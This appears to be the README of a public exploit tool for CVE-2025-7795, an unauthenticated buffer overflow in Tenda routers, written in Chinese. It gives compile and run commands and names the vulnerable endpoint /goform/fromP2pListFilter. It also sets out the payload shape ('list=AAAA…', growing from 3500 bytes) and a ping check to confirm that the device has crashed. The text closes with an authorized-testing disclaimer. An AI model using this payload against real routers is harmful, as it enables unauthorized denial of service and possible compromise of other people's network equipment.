作者:Byte Reaper
Telegram:@ByteReaper0
CVE-ID:CVE-2025-7795
漏洞类型:缓冲区溢出
目标设备:Tenda路由器
利用方式:远程、无需认证
某些Tenda路由器型号存在缓冲区溢出漏洞。通过向未受保护的端点发送精心构造的未经认证的 POST 请求即可触发该漏洞:
将利用源代码保存至 exploit.c。
编译代码:
gcc exploit.c argparse.c -o exploit -lcurl
sudo ./exploit -i <目标IP地址> [-v]
sudo ./exploit -u <目标URL> [-v]
-i, --ip :目标设备IP地址。-u, --url :目标设备的完整URL(例如 http://192.168.0.1)。-v, --verbose:启用详细输出(打印请求载荷和详细信息)。通过IP利用:
sudo ./exploit -i 192.168.1.1
通过URL利用并启用详细模式:
sudo ./exploit -u http://router.local -v
该利用程序生成一个形式为 list=AAAA… 的POST载荷,从3500字节开始,每次迭代增加1000字节(共5次迭代)。
它使用libcurl将请求发送至 /goform/fromP2pListFilter。
如果收到HTTP 2xx响应,则报告服务器仍然正常响应。
如果收到非2xx响应或连接失败,则向目标IP发送ping命令以确认设备是否已崩溃。
仅限授权测试:请仅在获得明确测试许可的环境中使用此利用程序。
法律声明:对不属于自己或无测试权限的系统进行未授权使用可能违法。